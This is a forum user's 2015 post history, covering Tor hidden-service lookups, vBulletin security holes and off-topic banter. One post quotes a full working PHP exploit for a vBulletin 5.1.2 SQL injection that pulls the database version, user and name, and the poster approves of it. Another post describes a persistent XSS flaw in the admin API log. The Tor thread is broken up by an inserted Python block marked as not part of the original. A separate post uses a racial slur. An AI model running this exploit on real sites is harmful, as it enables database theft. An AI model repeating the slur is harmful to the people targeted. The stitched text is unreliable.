Posts by Sophie
-
2015-07-01 at 3:28 PM UTC in How does TOR handle DNS queries for hidden services?
All TCP. Tor doesn't handle UDP yet.
Not yet? Will it do so in the future to your knowledge?
-
2015-07-01 at 2:44 PM UTC in ATTN: Lanny
You should probably limit posting in the news forum to the administrator usergroup.
-
2015-07-01 at 2:29 PM UTC in How does TOR handle DNS queries for hidden services?
This is actually pretty complicated, I'll see if I can remember it all.
In short, there's no DNS, and a .onion address is not a domain, but a 16 character string derived from the hidden service's public key.
When a hidden service comes online, it builds circuits to several relays and sends them its public key, which tells the relays it wants to use them as introduction points.
It then creates a hidden service descriptor and uploads it to Tor's distributed hash table, which is spread across all relays with the HSDir flag. The descriptor contains the service's public key and information about its introduction points, and is signed by its private key.
Once a client knows the .onion address of the service, it connects to the DHT to retrieve the hash, and learns about the service's public key and introduction points.
The client builds a circuit to another relay, which it will use as a rendezvous point, and tells it a one time secret. It then creates an introduce message containing the one time secret and information about the rendezvous point, and signs it with the service's public key. It sends this message to the introduction point, which then forwards it to the service.
The service decrypts the introduce message with its private key, creates a rendezvous message containing the one time secret, and sends it to the rendezvous point.
The rendezvous point tells the client that a connection has been established, and they proceed to communicate over separate Tor circuits. Few people realize that connecting to a hidden service involves 6 hops instead of 3, which is one of the reasons they tend to be so slow and time out often.
Also worth noting that the key pair used for authentication is only 1024 bit RSA, which is a pretty major criticism of hidden service security. I'm not really sure if I trust them anymore given that the implementation hasn't been updated in years.
That's pretty interesting, i was also wondering via what protocol this all transpires. Normal DNS goes via UDP but since there is no DNS involved is it safe to assume this all transpires via TCP? Sorry if it's a silly question but my knowledge of networking is pretty limited as of yet.
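The name-to-descriptor step described in the quoted explanation, as an added example that is not part of the original thread: it derives the 16-character address from a public key and computes the descriptor IDs a client looks up instead of doing a DNS query. The formulas follow the v2 rendezvous design (SHA-1, 80-bit permanent id, two replicas, daily rotation); the key bytes are a constructed stand-in and all function names are illustrative.

```python
import base64
import hashlib
import struct

# Constructed stand-in bytes, not a real RSA key: only the hashing is shown.
SAMPLE_KEY_DER = bytes.fromhex("30818902818100") + bytes(range(128)) + bytes.fromhex("0203010001")


def permanent_id(pubkey_der: bytes) -> bytes:
    """First 80 bits (10 bytes) of SHA-1 over the DER-encoded public key."""
    return hashlib.sha1(pubkey_der).digest()[:10]


def onion_address(pubkey_der: bytes) -> str:
    """Base32 of the permanent id: 10 bytes encode to exactly 16 characters."""
    return base64.b32encode(permanent_id(pubkey_der)).decode("ascii").lower() + ".onion"


def parse_onion(address: str) -> bytes:
    """Recover the permanent id from a v2 address, rejecting malformed names."""
    label = address.lower()
    if label.endswith(".onion"):
        label = label[: -len(".onion")]
    if len(label) != 16:
        raise ValueError("v2 onion label must be 16 base32 characters")
    return base64.b32decode(label.upper())  # raises ValueError on bad characters


def descriptor_ids(address: str, now: int, cookie: bytes = b"") -> list:
    """IDs a client looks up among the HSDir relays at Unix time `now`."""
    pid = parse_onion(address)
    # The daily rotation is offset per service by the first byte of its id.
    period = (now + pid[0] * 86400 // 256) // 86400
    ids = []
    for replica in (0, 1):  # v2 publishes two replicas of each descriptor
        secret = hashlib.sha1(struct.pack(">I", period) + cookie + bytes([replica])).digest()
        desc_id = hashlib.sha1(pid + secret).digest()
        ids.append(base64.b32encode(desc_id).decode("ascii").lower())
    return ids


def key_matches_address(pubkey_der: bytes, address: str) -> bool:
    """Self-authentication: the key in a fetched descriptor must hash to the name."""
    return permanent_id(pubkey_der) == parse_onion(address)


if __name__ == "__main__":
    addr = onion_address(SAMPLE_KEY_DER)
    print(addr, descriptor_ids(addr, now=1435760940))
```

Because the name is a truncated hash of the key, a client can reject any descriptor whose key does not hash back to the address it asked for, which is what replaces a trusted resolver here.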
-
2015-07-01 at 10:39 AM UTC in ATTN: Lanny
Where do you meet women like this?
One of them i met way back when i was still a kid, like 14. It went a little like this:
1. Have reasonably rich parents.
2. Live in an upper middle class neighborhood. (This is important because in general the well off people are the smart people and will probably have smart kids)
3. Hang out on the streets like some hoodlum in your spare time.
4. Meet people(girls included) who do the same.
Shit man i met all kinds of people, some smart some not this girl just happened to be an intelligent one. And the other one i met because a good friend of mine got involved with her. He met her in his area at a bar, lol.
I think Dutch culture is different in general from American culture though. There are lots of smart people here the only dumb ones are literally the immigrants and the niggers and i ain't even racist. There are also a lot of idiots in the bigger cities.
-
2015-07-01 at 10:20 AM UTC in How does TOR handle DNS queries for hidden services?
I read that normally the exit node queries the DNS server which sends the resolved host back through the network. But how does this work with .onion domains?
-
2015-07-01 at 10:02 AM UTC in ATTN: Lanny
We all crave Lanny's attention so desperately. He's the closest thing many of us have had to a genuinely cool and intelligent female in our lives.
Have you ever considered a sex change operation? Could be an interesting experience, having lived as both a man and a woman. The latter may suit you more, give you an unrivaled sense of freedom.
It would be pretty awkward if Lanny suddenly had a sex change. But what do i know.
#LGBBQTranFolkLyfe
Also, i actually have two female friends that are intelligent and cool believe it or not(And a sister), and i would only bang one of them, who am i kidding i'd probably bang them both(Not my sister, she's not attractive enough) but that's immaterial. They're actually pretty smart.
Come to think of it, one of these girls was almost my GF at some point. Unfortunately i was seeing someone else at the time so i decided against it. Nevertheless that would have been pretty interesting.
-
2015-07-01 at 6:20 AM UTC in lanny why have you named your database table and username both VB
I think it's pretty sad that Lanny has to do Internet Brands' job for them. They've had literally YEARS to patch this crap.
I found more. Persistent XSS vulnerability.
vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name) allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. Code is executed once an admin visits the API log page and clicks on the API client's name.
Vulnerable component: ./admincp/apilog.php?do=viewclient
apilog.php does not sanitize xmlrpc client provided data before passing it to print_label_row to generate the output page.
-
2015-07-01 at 5:53 AM UTC in ATTN: Lanny
sophisticated sophist is lacking in the sophistication area. Hey mq, how are you?
Just messing around breh.
-
2015-07-01 at 5:25 AM UTC in Artwork by Alex Grey.
this place isn't the same as rdfrn, and I actually do engage in "nerdish" things, I play with my cat, drink fine wine, and read french scifi literature.
Not that nerdy bro, learn science and computers then put on glasses and pull your waist band up high then you can call yourself a nerd.
-
2015-07-01 at 5:24 AM UTC in Artwork by Alex Grey.
-
2015-07-01 at 4:56 AM UTC in lanny why have you named your database table and username both VB
<?php
/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/
error_reporting(E_ALL);
ini_set('display_errors', 1);
// Get arguments
$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);
// Function to send a POST request
function httpPost($url,$params)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));
$output = curl_exec($ch);
if($output == FALSE) print htmlspecialchars(curl_error($ch));
curl_close($ch);
return $output;
}
// Function to get string between two other strings
function get_string_between($string, $start, $end)
{
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
// Get version
print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
// Get user
print "\r\nUser: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
// Get database
print "\r\nDatabse: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
print "\r\n"
?>
Lanny patched it already but i dig the script.
-
2015-07-01 at 4:31 AM UTC in ppl who wanna fight you over internet bullshit
it's no big deal, you 1337 haxor with linux :)
He's more 1337 than you think. :)
-
2015-07-01 at 4:23 AM UTC in Niggas in space?
that's an awesome link. Thanks
Yeah man, it's awesome they have loads of courses. I'm doing one myself actually, so far it's been pretty insightful.
-
2015-07-01 at 4:02 AM UTC in ATTN: Lanny
Since you're a socialist and run this bitch i propose you change your name to Lenni in honor of Vladimir Lenin. Lead the BBS revolution and make us 100% social. To that effect i suggest you redistribute likes from the wealthy to the poor. The proletariat will thank you for it and we can live in mediocrity in seaculo seaclurom.
Here's a song in your honor.
Here are some words of encouragement in Russian. (Transliterated because idk Cyrillic)
Revoluytziye nadezhdah sgoostk vierif sekh luydeye.
-
2015-07-01 at 3:48 AM UTC in Isn't it weird how psychomanthis turned out?
Because it nearly took you 15 minutes to come up with a response, you fucktard. (Check the timestamp)
No u.
-
2015-07-01 at 3:47 AM UTC in ATTN: Micheal Myers
Is that supposed to be Dutch or Urdu?
"Awesome", but bastardized in a phonetic way.
-
2015-07-01 at 3:41 AM UTC in Deez guys stare at each other all day
Dat panny.
Dat §m£ÂgØL.
Dat 4j.
-
2015-06-30 at 10:59 PM UTC in lanny why have you named your database table and username both VB
no such thing.
Alright then IDK why.
-
2015-06-30 at 10:48 PM UTC in lanny why have you named your database table and username both VB
Maybe VB is the default account.
-
2015-06-30 at 9:07 PM UTC in you pedo phaggots will like this
Word.